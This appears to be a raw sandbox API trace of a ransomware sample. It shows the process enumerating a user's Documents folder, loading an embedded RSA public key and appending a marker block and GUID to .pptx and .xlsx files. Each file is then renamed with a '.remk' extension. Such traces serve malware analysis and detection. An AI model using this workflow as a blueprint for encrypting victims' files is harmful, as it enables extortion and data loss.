Flags=0x0, Size=0x10) returned 0x31ee148 [0232.087] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ee8 [0232.087] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x31ee130 [0232.087] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fea0 [0232.087] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x31c0f10 [0232.087] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0232.087] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6930 [0232.087] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f08 [0232.087] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x31f6b30 [0232.087] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f28 [0232.087] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0232.087] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0232.087] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee148 | out: hHeap=0x630000) returned 1 [0232.087] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0232.087] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee130 | out: hHeap=0x630000) returned 1 [0232.087] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0232.087] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0232.087] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee190 | out: hHeap=0x630000) returned 1 [0232.087] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0232.087] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d69f0 | out: hHeap=0x630000) returned 1 [0232.088] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1b88 | out: hHeap=0x630000) returned 1 [0232.088] GetCurrentThreadId () returned 0x314 [0232.088] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31c0f10 [0232.088] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x37b8c90 [0232.088] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x31a8ac8 [0232.088] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x694398 [0232.088] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x31a4298 [0232.088] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0232.088] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fea0 [0232.088] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3192918 [0232.088] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0232.088] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0232.088] GetCurrentThreadId () returned 0x314 [0232.088] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0232.088] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0232.088] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x65dd10 [0232.088] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0232.088] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0232.088] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0232.088] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0232.088] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0232.088] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x65dd10 [0232.088] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0232.088] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x31b5498 [0232.089] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0232.089] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31b6580 [0232.089] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0232.089] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee190 [0232.089] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0232.089] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0232.089] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0232.089] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed18 [0232.089] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed28 [0232.089] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f758 [0232.089] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f768 [0232.089] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f778 [0232.089] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee130 [0232.089] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0232.090] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x3f33, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0232.090] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0232.090] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0232.090] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0232.090] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0232.090] CloseHandle (hObject=0x640) returned 1 [0232.092] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\zc2zwOgAl9dWZ8.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\zc2zwogal9dwz8.pptx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\zc2zwOgAl9dWZ8.pptx.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\zc2zwogal9dwz8.pptx.remk")) returned 1 [0232.092] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0232.093] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0232.093] VirtualFree (lpAddress=0x3c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0232.094] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e568 | out: hHeap=0x630000) returned 1 [0232.094] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec0a6be0, ftCreationTime.dwHighDateTime=0x1d5905a, ftLastAccessTime.dwLowDateTime=0xc3876800, ftLastAccessTime.dwHighDateTime=0x1d5c13b, ftLastWriteTime.dwLowDateTime=0xc3876800, ftLastWriteTime.dwHighDateTime=0x1d5c13b, nFileSizeHigh=0x0, nFileSizeLow=0x12c2b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Zp4bSgmkw1VmD6V.pptx", cAlternateFileName="ZP4BSG~1.PPT")) returned 1 [0232.094] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Zp4bSgmkw1VmD6V.pptx") returned=".pptx" [0232.094] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Zp4bSgmkw1VmD6V.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\zp4bsgmkw1vmd6v.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0232.095] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=76843) returned 1 [0232.095] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0232.098] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x12c05, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0232.098] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0232.100] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x12c2b, lpOverlapped=0x0) returned 1 [0232.101] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0232.101] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0232.101] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0232.101] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694398) returned 1 [0232.102] CryptCreateHash (in: hProv=0x694398, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0232.102] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0232.102] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0232.102] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0232.102] GetLastError () returned 0x0 [0232.102] CryptDestroyHash (hHash=0x31de170) returned 1 [0232.102] CryptReleaseContext (hProv=0x694398, dwFlags=0x0) returned 1 [0232.103] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0232.103] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0232.103] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0232.103] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0232.103] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0232.103] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0232.103] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x325d6d0 [0232.103] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee148 | out: hHeap=0x630000) returned 1 [0232.103] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee160 | out: hHeap=0x630000) returned 1 [0232.104] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee1a8 | out: hHeap=0x630000) returned 1 [0232.104] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ec670 | out: hHeap=0x630000) returned 1 [0232.104] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325d6d0 | out: hHeap=0x630000) returned 1 [0232.104] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee1a8 [0232.104] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fec0 [0232.104] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee160 [0232.104] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0f28 [0232.104] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x31ee148 [0232.104] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fea0 [0232.104] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x31c0f10 [0232.104] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0232.104] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d69f0 [0232.104] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f08 [0232.104] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x31f6b30 [0232.104] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ee8 [0232.104] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0232.104] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0232.104] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee160 | out: hHeap=0x630000) returned 1 [0232.104] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0232.104] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee148 | out: hHeap=0x630000) returned 1 [0232.104] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0232.104] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0232.104] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee1a8 | out: hHeap=0x630000) returned 1 [0232.104] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0232.105] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6930 | out: hHeap=0x630000) returned 1 [0232.105] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1b88 | out: hHeap=0x630000) returned 1 [0232.105] GetCurrentThreadId () returned 0x314 [0232.105] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31c0f10 [0232.105] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x37b8d20 [0232.105] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x31a8ac8 [0232.105] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x694398 [0232.105] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x31a4298 [0232.105] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0232.105] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fea0 [0232.105] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3192918 [0232.105] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0232.105] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0232.105] GetCurrentThreadId () returned 0x314 [0232.105] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0232.105] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0232.105] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x65dd10 [0232.105] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0232.105] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0232.105] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0232.105] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0232.105] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0232.105] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x65dd10 [0232.106] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0232.106] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x31b5498 [0232.106] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0232.106] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31b6580 [0232.106] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0232.106] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee1a8 [0232.106] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0232.106] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0232.106] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0232.106] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed28 [0232.106] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed18 [0232.106] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f758 [0232.106] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f768 [0232.106] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f778 [0232.106] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee148 [0232.106] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0232.106] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fee0 [0232.106] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0232.106] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0232.106] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f788 [0232.106] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f798 [0232.106] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f7a8 [0232.106] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee160 [0232.106] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f798 | out: hHeap=0x630000) returned 1 [0232.106] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f28 [0232.107] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f788 | out: hHeap=0x630000) returned 1 [0232.107] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee130 [0232.107] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f7a8 | out: hHeap=0x630000) returned 1 [0232.107] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee1c0 [0232.107] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0232.107] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72feb0 [0232.107] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f768 | out: hHeap=0x630000) returned 1 [0232.107] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee190 [0232.107] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0232.107] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee178 [0232.107] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0232.107] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee1d8 [0232.108] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x12c2b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0232.108] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0232.108] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0232.108] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0232.108] CloseHandle (hObject=0x640) returned 1 [0232.110] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x694398 [0232.110] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x890) returned 0x37b5b70 [0232.110] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Zp4bSgmkw1VmD6V.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\zp4bsgmkw1vmd6v.pptx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Zp4bSgmkw1VmD6V.pptx.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\zp4bsgmkw1vmd6v.pptx.remk")) returned 1 [0232.112] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7084af40, ftCreationTime.dwHighDateTime=0x1d5ab43, ftLastAccessTime.dwLowDateTime=0xcd120a10, ftLastAccessTime.dwHighDateTime=0x1d5b56a, ftLastWriteTime.dwLowDateTime=0xcd120a10, ftLastWriteTime.dwHighDateTime=0x1d5b56a, nFileSizeHigh=0x0, nFileSizeLow=0x14c8e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_33tr7aCFWUbIhs9iqCR.xlsx", cAlternateFileName="_33TR7~1.XLS")) returned 1 [0232.112] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325e490 [0232.112] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e568 [0232.112] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_33tr7aCFWUbIhs9iqCR.xlsx") returned=".xlsx" [0232.112] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_33tr7aCFWUbIhs9iqCR.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_33tr7acfwubihs9iqcr.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0232.113] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=85134) returned 1 [0232.113] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0232.116] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x14c68, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0232.116] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0232.118] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0232.118] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x14c8e, lpOverlapped=0x0) returned 1 